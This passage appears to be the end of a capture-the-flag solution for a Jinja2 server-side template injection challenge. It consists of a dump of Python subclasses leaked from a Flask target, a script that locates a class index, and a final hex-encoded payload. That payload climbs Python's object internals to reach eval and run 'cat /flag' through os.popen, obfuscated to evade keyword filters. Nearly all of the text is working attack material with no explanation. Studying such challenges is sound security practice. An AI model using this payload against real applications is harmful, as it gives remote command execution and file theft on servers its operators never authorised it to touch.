>, <class 'typing._Immutable'>, <clas
s 'typing.Generic'>, <class 'typing._Ty
pingEmpty'>, <class 'typing._TypingEllipsis
'>, <class 'typing.NamedTuple'>, &lt
;class 'typing.io'>, <class 'typing.re&
#39;>, <class 'markupsafe._MarkupEscapeHelper&#
39;>, <class 'http.client.HTTPConnection'&g
t;, <class 'mimetypes.MimeTypes'>, <clas
s 'werkzeug._internal._Missing'>, <class &#
39;werkzeug.exceptions.Aborter'>, <class 'w
erkzeug.urls.Href'>, <class 'urllib.request
.Request'>, <class 'urllib.request.OpenerDi
rector'>, <class 'urllib.request.BaseHandle
r'>, <class 'urllib.request.HTTPPasswordMgr
'>, <class 'urllib.request.AbstractBasicAut
hHandler'>, <class 'urllib.request.Abstract
DigestAuthHandler'>, <class 'urllib.request
.URLopener'>, <class 'urllib.request.ftpwra
pper'>, <class 'http.cookiejar.Cookie'&
gt;, <class 'http.cookiejar.CookiePolicy'>,
 <class 'http.cookiejar.Absent'>, <class
 'http.cookiejar.CookieJar'>, <class 'w
erkzeug.datastructures.ImmutableListMixin'>, <c
lass 'werkzeug.datastructures.ImmutableDictMixin'
>, <class 'werkzeug.datastructures._omd_bucket&
#39;>, <class 'werkzeug.datastructures.Headers&
#39;>, <class 'werkzeug.datastructures.Immutabl
eHeadersMixin'>, <class 'werkzeug.datastruc
tures.IfRange'>, <class 'werkzeug.datastruc
tures.Range'>, <class 'werkzeug.datastructu
res.ContentRange'>, <class 'werkzeug.datast
ructures.FileStorage'>, <class 'dataclasses
._HAS_DEFAULT_FACTORY_CLASS'>, <class 'data
classes._MISSING_TYPE'>, <class 'dataclasse
s._FIELD_BASE'>, <class 'dataclasses.InitVa
r'>, <class 'dataclasses.Field'>, &l
t;class 'dataclasses._DataclassParams'>, <c
lass 'werkzeug.sansio.multipart.Event'>, <c
lass 'werkzeug.sansio.multipart.MultipartDecoder'
>, <class 'werkzeug.sansio.multipart.MultipartE
ncoder'>, <class 'werkzeug.wsgi.ClosingIter
ator'>, <class 'werkzeug.wsgi.FileWrapper&#
39;>, <class 'werkzeug.wsgi._RangeWrapper'&
gt;, <class 'werkzeug.utils.HTMLBuilder'>, 
<class 'werkzeug.wrappers.accept.AcceptMixin'&
gt;, <class 'werkzeug.wrappers.auth.AuthorizationM
ixin'>, <class 'werkzeug.wrappers.auth.WWWA
uthenticateMixin'>, <class '_json.Scanner&#
39;>, <class '_json.Encoder'>, <class
 'json.decoder.JSONDecoder'>, <class 'j
son.encoder.JSONEncoder'>, <class 'werkzeug
.formparser.FormDataParser'>, <class 'werkz
eug.formparser.MultiPartParser'>, <class 'w
erkzeug.user_agent.UserAgent'>, <class 'wer
kzeug.useragents._UserAgentParser'>, <class &#3
9;werkzeug.sansio.request.Request'>, <class &#3
9;werkzeug.wrappers.request.StreamOnlyMixin'>, &lt
;class 'werkzeug.sansio.response.Response'>, &
lt;class 'werkzeug.wrappers.response.ResponseStream&#
39;>, <class 'werkzeug.wrappers.response.Respon
seStreamMixin'>, <class 'werkzeug.wrappers.
common_descriptors.CommonRequestDescriptorsMixin'>
, <class 'werkzeug.wrappers.common_descriptors.Com
monResponseDescriptorsMixin'>, <class 'werk
zeug.wrappers.etag.ETagRequestMixin'>, <class &
#39;werkzeug.wrappers.etag.ETagResponseMixin'>, &l
t;class 'werkzeug.wrappers.user_agent.UserAgentMixin&
#39;>, <class 'werkzeug.test._TestCookieHeaders
'>, <class 'werkzeug.test._TestCookieRespon
se'>, <class 'werkzeug.test.EnvironBuilder&
#39;>, <class 'werkzeug.test.Client'>, &
lt;class 'decimal.Decimal'>, <class 'de
cimal.Context'>, <class 'decimal.SignalDict
Mixin'>, <class 'decimal.ContextManager&#39
;>, <class 'numbers.Number'>, <class 
'uuid.UUID'>, <class 'jinja2.bccache.Bu
cket'>, <class 'jinja2.bccache.BytecodeCach
e'>, <class 'jinja2.utils.MissingType'&
gt;, <class 'jinja2.utils.LRUCache'>, <c
lass 'jinja2.utils.Cycler'>, <class 'ji
nja2.utils.Joiner'>, <class 'jinja2.utils.N
amespace'>, <class 'jinja2.nodes.EvalContex
t'>, <class 'jinja2.nodes.Node'>, &l
t;class 'jinja2.visitor.NodeVisitor'>, <cla
ss 'jinja2.idtracking.Symbols'>, <class &#3
9;jinja2.compiler.MacroRef'>, <class 'jinja
2.compiler.Frame'>, <class 'jinja2.runtime.
TemplateReference'>, <class 'jinja2.runtime
.Context'>, <class 'jinja2.runtime.BlockRef
erence'>, <class 'jinja2.runtime.LoopContex
t'>, <class 'jinja2.runtime.Macro'>,
 <class 'jinja2.runtime.Undefined'>, <cl
ass 'jinja2.lexer.Failure'>, <class 'ji
nja2.lexer.TokenStreamIterator'>, <class 'j
inja2.lexer.TokenStream'>, <class 'jinja2.l
exer.Lexer'>, <class 'jinja2.parser.Parser&
#39;>, <class 'jinja2.environment.Environment&#
39;>, <class 'jinja2.environment.Template'&
gt;, <class 'jinja2.environment.TemplateModule&#39
;>, <class 'jinja2.environment.TemplateExpressi
on'>, <class 'jinja2.environment.TemplateSt
ream'>, <class 'jinja2.loaders.BaseLoader&#
39;>, <class 'werkzeug.local.Local'>, &l
t;class 'werkzeug.local.LocalStack'>, <clas
s 'werkzeug.local.LocalManager'>, <class &#
39;werkzeug.local._ProxyLookup'>, <class 'w
erkzeug.local.LocalProxy'>, <class 'difflib
.SequenceMatcher'>, <class 'difflib.Differ&
#39;>, <class 'difflib.HtmlDiff'>, <c
lass 'werkzeug.routing.RuleFactory'>, <clas
s 'werkzeug.routing.RuleTemplate'>, <class 
'werkzeug.routing.BaseConverter'>, <class &
#39;werkzeug.routing.Map'>, <class 'werkzeu
g.routing.MapAdapter'>, <class 'click._comp
at._FixupStream'>, <class 'click._compat._A
tomicFile'>, <class 'click.utils.LazyFile&#
39;>, <class 'click.utils.KeepOpenFile'>
, <class 'click.utils.PacifyFlushWrapper'>,
 <class 'click.types.ParamType'>, <class
 'click.parser.Option'>, <class 'click.
parser.Argument'>, <class 'click.parser.Par
singState'>, <class 'click.parser.OptionPar
ser'>, <class 'click.formatting.HelpFormatt
er'>, <class 'click.core.Context'>, 
<class 'click.core.BaseCommand'>, <class
 'click.core.Parameter'>, <class 'flask
.signals.Namespace'>, <class 'flask.signals
._FakeSignal'>, <class 'flask.cli.Dispatchi
ngApp'>, <class 'flask.cli.ScriptInfo'&
gt;, <class 'flask.config.ConfigAttribute'>
, <class 'flask.ctx._AppCtxGlobals'>, <c
lass 'flask.ctx.AppContext'>, <class 'f
lask.ctx.RequestContext'>, <class 'flask.sc
affold.Scaffold'>, <class 'itsdangerous._js
on._CompactJSON'>, <class 'itsdangerous.sig
ner.SigningAlgorithm'>, <class 'itsdangerou
s.signer.Signer'>, <class 'itsdangerous.ser
ializer.Serializer'>, <class 'flask.json.ta
g.JSONTag'>, <class 'flask.json.tag.TaggedJ
SONSerializer'>, <class 'flask.sessions.Ses
sionInterface'>, <class 'flask.blueprints.B
lueprintSetupState'>, <class 'unicodedata.U
CD'>
'''
a = a.replace('\n', '')
print()
b = a.split('>, <')
for i in range(len(b)):
    if b[i].find('codecs.IncrementalEncoder') != -1:
        print(i)
        break

最终payload:

{{()|attr("\x5f\x5fc\x6cass\x5f\x5f")|attr("\x5f\x5fb\x61ses\x5f\x5f")|attr("\x5f\x5f\x73\x75\x62cl\x61ss\x65s\x5f\x5f")()|attr("\x5f\x5fge\x74item\x5f\x5f")(98)|attr("\x5f\x5finit\x5f\x5f")|attr("\x5f\x5fglob\x61ls\x5f\x5f")|attr("\x5f\x5fge\x74item\x5f\x5f")("\x5f\x5fb\x75\x69ltins\x5f\x5f")|attr("\x5f\x5fge\x74item\x5f\x5f")("ev\x61l")("\x5f\x5f\x69\x6d\x70\x6f\x72\x74\x5f\x5f\x28\x22\x6f\x73\x22\x29\x2e\x70\x6f\x70\x65\x6e\x28\x22\x63\x61\x74\x20\x2f\x66\x6c\x61\x67\x22\x29\x2e\x72\x65\x61\x64\x28\x29")}}